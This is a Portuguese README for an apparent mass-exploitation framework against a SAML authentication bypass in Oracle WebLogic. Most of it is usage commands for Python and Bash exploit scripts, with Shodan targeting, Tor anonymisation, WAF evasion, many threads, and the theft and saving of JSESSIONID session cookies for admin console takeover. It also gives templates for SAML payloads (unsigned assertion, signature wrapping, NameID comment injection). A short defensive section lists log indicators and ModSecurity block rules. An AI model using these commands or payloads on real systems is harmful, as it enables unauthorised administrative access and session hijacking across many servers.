
👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Versões Bash e Python. Recursos: --detect verificação segura, --exploit combo/unsigned/xsw/nameid/all, --integração shodan, --suporte tor, varredura em massa, saída JSON/CSV/JSONL, validação de cookies. 🛡️ CVSS 9.9 Crítico - Use Eticamente, Permaneça Legal. 🔒

Framework de Exploit & Scanner em Massa
Apenas para testes de segurança autorizados.
Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizados.
Os autores e contribuidores não são responsáveis por qualquer uso indevido ou dano causado por este software. Os usuários são os únicos responsáveis por garantir que possuem permissão explícita por escrito do proprietário do alvo antes de testar. O acesso não autorizado a sistemas de computador é ilegal sob o Computer Fraud and Abuse Act (CFAA) e leis similares em todo o mundo.
Ao usar este software, você concorda em:
⚠️ AVISO: Esta vulnerabilidade está sendo ativamente explorada na natureza. O uso não autorizado pode resultar em sérias consequências legais.
CVE-2026-60206 é uma vulnerabilidade crítica de bypass de autenticação não autenticado na implementação SAML (Security Assertion Markup Language) do Oracle WebLogic Server. Ela permite que invasores remotos contornem a autenticação SAML e obtenham acesso administrativo ao console do WebLogic sem credenciais válidas.
Injeção SAML: A vulnerabilidade decorre da validação inadequada de asserções SAML. Invasores podem criar respostas SAML maliciosas que ignoram as verificações de autenticação.
Bypass de Assinatura: A vulnerabilidade permite contornar a validação de assinatura XML por meio de ataques de XML Signature Wrapping (XSW), onde invasores envolvem asserções maliciosas com assinaturas legítimas.
Manipulação de NameID: Invasores podem injetar comentários ou manipular o campo NameID para se passar por usuários privilegiados.
Acesso Admin: A exploração bem-sucedida concede ao invasor acesso administrativo ao console do WebLogic Server com controle total.
O multi-exploit educacional completo encadeia vários vetores de ataque SAML para alcançar o bypass de autenticação, com recursos avançados para varredura em massa, captura de cookies e acesso administrativo.
--detect)O verificador seguro realiza detecção não intrusiva de vulnerabilidades sem executar payloads prejudiciais ou fazer alterações no sistema.
curl (para versão Bash)pip (para biblioteca requests, versão Python)# Versão Python
pip install requests urllib3
# Opcional: suporte Shodan
pip install shodan
# Versão Bash: apenas curl (sem dependências adicionais)
[!NOTE] A versão Bash funciona apenas com
curle não possui dependências externas. A versão Python requerrequestseurllib3(opcional:shodanpara integração com Shodan).
exploit.py)# Exploit em alvo único (modo combo)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit com todos os vetores de ataque
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Varredura em massa a partir de arquivo (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Apenas detecção segura (não intrusiva)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Integração com Shodan
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Varredura anonimizada com Tor
python exploit.py -l targets.txt --exploit --tor -t 20
# Suporte a proxy
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Saída streaming JSONL (eficiente em memória para varreduras grandes)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Modo silencioso (saída mínima)
python exploit.py -l targets.txt --exploit -q -o results.json
# Timeout e retry personalizados
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# Bypass de verificação SSL
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Depuração verbosa
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Exploit em alvo único
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Varredura em massa
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Varredura anonimizada com Tor
./exploit.sh -l targets.txt --exploit --tor -t 20
# Integração com Shodan
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Saída streaming JSONL
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Suporte a proxy
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Bypass de verificação SSL
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Modo silencioso
./exploit.sh -l targets.txt --exploit -q -o results.json
# Depuração verbosa
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Validação em alvo único
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Validação em massa com relatório
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# Bypass de verificação SSL
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Suporte a proxy
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
⚠️ Importante: Esta vulnerabilidade afeta implantações auto-hospedadas do WebLogic Server. Aplique o Oracle CPU Julho de 2026 imediatamente.
A vulnerabilidade permite que invasores contornem a autenticação SAML criando respostas SAML maliciosas que são validadas inadequadamente pela implementação SAML do WebLogic.
Endpoint Vulnerável:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
Asserção Sem Assinatura
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
XML Signature Wrapping (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
Injeção de Comentário em NameID
<saml2:NameID Format="...">
lowpriv</saml2:NameID>
A exploração bem-sucedida produz um cookie JSESSIONID, concedendo acesso administrativo ao console do WebLogic.
O cookie roubado pode ser usado para acessar:
Pesquise nos logs do WebLogic por:
access.log – requisições para /saml2/sp/acs, /saml2/acs com parâmetros SAML incomunsdomain.log – tentativas de bypass de autenticação com asserções SAML inválidasdiagnostic.log – erros de parsing SAML ou falhas de validação de assinaturaSAMLResponse contendo:
<saml2:Assertion><saml2:NameID>javascript: ou eval() nos parâmetrosconfig.xml, jps-config.xml)autodeployweblogic.security modificados# Bloquear requisições SAML com múltiplas asserções
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Múltiplas Asserções SAML',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Bloquear requisições SAML com comentários em NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Comentários em NameID',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Bloquear asserções SAML sem assinatura
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Asserção Sem Assinatura',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"
| Atributo | Valor |
|---|
| 📅 Descoberta | Julho de 2026 (Oracle CPU) |
| ⚠️ Pontuação CVSS | 9.9 (CRÍTICA) |
| 📋 CISA KEV | Adicionado em 21 de julho de 2026 |
| 🎯 Produtos Afetados | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 Versões Corrigidas | Oracle CPU Julho de 2026 |
| 🔓 Autenticação | Não necessária (Pré-Auth) |
| 🌍 Exploração Ativa | Confirmada na natureza (julho de 2026) |
| Recurso | Descrição |
|---|
| 🚀 Multi-Vetor de Exploit | 7 vetores de ataque: unsigned, xsw_v1-4, nameid, combo |
| 💻 Varredura em Massa | Varredura concorrente com pool de threads (Python) / FIFO (Bash) |
| 🔐 Roubo de Cookie | Rouba JSESSIONID para sequestro de sessão |
| 👑 Acesso ao Console Admin | Acesso administrativo total ao console do WebLogic |
| 📁 Detecção de Versão | Detecta versões do WebLogic e status de vulnerabilidade |
| 🌐 Varredura em Lote | Explora múltiplos alvos com threading |
| 🎯 Detecção Segura | Flag opcional --detect para verificação não intrusiva |
| 🧩 Integração com Shodan | Carrega alvos diretamente da busca do Shodan |
| 🔍 Suporte a Tor | Anonimiza a varredura com proxy Tor |
| 📊 Múltiplos Formatos de Saída | JSON, CSV, saída streaming JSONL |
| 🪟 Multiplataforma | Suporta Linux, macOS, BSD, Alpine, WSL |
| 🔒 Thread-Safe | Usa mecanismos de trava para operações concorrentes |
| 📋 Salvamento Automático de Sessão | Salva cookies bem-sucedidos para uso posterior |
| ⚙️ Bypass de WAF | Rotação de User-Agent e atrasos aleatórios |
| Vetor | Descrição |
|---|
unsigned | Asserção SAML não autenticada sem assinatura |
xsw_v1 | XML Signature Wrapping - Múltiplas asserções |
xsw_v2 | XSW - Bypass de assinatura envelopada |
xsw_v3 | XSW - Manipulação de namespace |
xsw_v4 | XSW - Injeção de múltiplas asserções |
nameid | Injeção de comentário em NameID |
combo | Ataque combinado (unsigned + XSW + NameID) |
| Recurso | Descrição |
|---|
| 🔍 Detecção de WebLogic | Identifica instâncias do WebLogic via LoginForm.jsp |
| 📊 Detecção de Versão | Detecta versões específicas do WebLogic e níveis de patch |
| 🧪 Descoberta de Endpoint SAML | Testa endpoints SAML ACS |
| 🔒 Não Intrusivo | Apenas identifica versões vulneráveis |
| 📋 Saída JSON/CSV | Exporta resultados para relatórios |
| 🔄 Varredura em Massa | Escaneia múltiplos alvos com suporte a threading |
| Versão do Oracle WebLogic | Status |
|---|
| 12.2.1.4.0 | 🔴 VULNERÁVEL |
| 14.1.1.0.0 | 🔴 VULNERÁVEL |
| 14.1.2.0.0 | 🔴 VULNERÁVEL |
| 15.1.1.0.0 | 🔴 VULNERÁVEL |
| Outras versões | Verifique o Oracle CPU Julho de 2026 |